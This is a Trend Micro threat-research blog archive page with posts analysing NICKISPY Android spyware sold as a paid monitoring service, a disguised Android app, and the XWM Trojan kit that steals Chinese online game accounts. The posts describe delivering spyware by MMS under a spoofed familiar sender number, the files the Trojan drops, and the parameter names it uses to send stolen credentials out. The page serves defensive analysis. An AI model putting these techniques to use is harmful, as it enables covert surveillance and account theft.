Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    September 2015
    S M T W T F S
    « Aug    
  • Email Subscription

  • About Us

    Author Archive - Lion Gu (Senior Threat Researcher)

    Trend Micro uncovered how cybercriminals may profit from NICKISPY variants. A Chinese website offers mobile phone monitoring tools and services to customers who are given access to the site’s backend to retrieve information. However, such services are not cheap and can cost from US$300–540.

    We’ve been reporting about several NICKISPY variantsAndroid malware that can monitor a mobile phone user’s activities and whereabouts like SMS, phone calls, and location—here on the Malware Blog and we’ve been curious as to how cybercriminals use private information and earn money from stealing it.

    Now, we have a clear example. We found a Chinese website that offers a mobile phone monitoring service. Once a customer decides to employ the service, he/she gets an account to log in to a backend server of the service, from which information gathered from a target device can be viewed.

    The backend service can be accessed through a portal where the user must first send an MMS that includes malware as an attachment to a victim’s mobile phone number. The malware, once installed on the victim’s mobile phone, will be used to monitor information related to SMS, phone calls, device location, and email messages. Reports are then sent back to the backend service, which can then be accessed by the customer through the portal.

    Here is the configuration page of the backend server’s portal:

    Click for larger view

    The Remote Receiver Phone Number filed is the phone number that will receive the reports sent by the service, which contains new activity information from the monitored phone. Note that the customer may choose which number will be displayed as the sender of the MMS. Using a number that the victim is familiar with may convince him/her that he/she is receiving a normal MMS and be completely unaware that a malware was already installed in his/her device.

    Read the rest of this entry »


    We recently found an Android malware that comes off as a variety of applications in a China-based third-party app store.

    The samples we were able to acquire came in the guise of a love test app, an e-book reader, or a location tracker. It is immediately noticeable that the said apps do more than these are supposed to based on the permissions these seek.

    This particular Android malware detected as ANDROIDOS_LUVRTAP.B automatically executes once an infected Android device is rebooted.

    Read the rest of this entry »


    Recently, my colleagues have been reporting about tools cybercriminals used in their operations. They reported about Twitter spam and botnet kits, fake point-of-sale (POS) devices, and distributed denial-of-service (DDoS) tools. This time, I will share some information about yet another tool, one that specifically affects Chinese online gamers.

    China is well-known for having a huge population of online gamers. In fact, a recently published study stated that there were 68 million gamers in the country in 2009, which is expected to increase to 141 million by 2014.

    Unfortunately, along with these continuing developments in the gaming industry come opportunities for cybercriminals to make money by selling virtual assets extracted from stolen online gaming accounts.

    Just like the tools previously mentioned, cybercriminals also utilize Trojan generators to steal online game accounts. “响尾马” (Xian Wei Ma or XWM, which means “rattle Trojan” in Chinese) is a popular Chinese Trojan kit. The main highlight of the XWM Kit is that it does not only have Trojan generators but also has a backend server that it uses to receive and sort stolen information, making its operation really convenient for cybercriminals.

    The XWM Kit includes 21 Trojan generators that target popular online games in China, most of which are local games (see Figure 1).

    Click for larger view

    These generators require some configuration before generating a new Trojan. Users need to input the backend server’s URL in order to receive stolen information sent by the Trojan.

    Click for larger view

    Once executed on a victim’s system, the generated Trojan will drop the following files:

    • %system32%{4 random characters}.dll
    • %system32%{4 random characters}.cfg
    • %system32%driversmsacpe.sys

    The .DLL file is loaded in the system’s memory and is used to steal account information as well as to send the information back to the backend server using the following string as URL argument:


    The above-mentioned argument has eight variables, which are used to send back stolen information to the backend server. The variables in the argument are defined as:

    • ‘a’ — area of online game server
    • ‘s’ — server name
    • ‘u’ — user name
    • ‘p’ — password
    • ‘r’ — role
    • ‘l’ — level
    • ‘m’ — virtual money
    • ‘pin’ — PIN code

    The stolen information is then sent to the backend server URL, which is contained in the .CFG file. The cybercriminals then access the backend server, which stores all the stolen information, through a specially developed home page.

    Click for larger view

    The cybercriminals selling this tool even provided a demo page where a list of supposedly stolen information is displayed, showing just how effective the tool is.

    Click for larger view

    The danger in all this lies not only in the attacks that the tool kit can instigate but also in its availability. The more people who use the toolkit, the more people that can be victimized. Thus, more cybercriminals will be motivated to conduct their own operations. This proves yet again how technology can make many things convenient for us while unfortunately doing the same for cybercriminals.

    Posted in Bad Sites, Botnets, Malware | Comments Off on XWM Kit: A Popular Chinese Online Gaming Trojan Kit


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice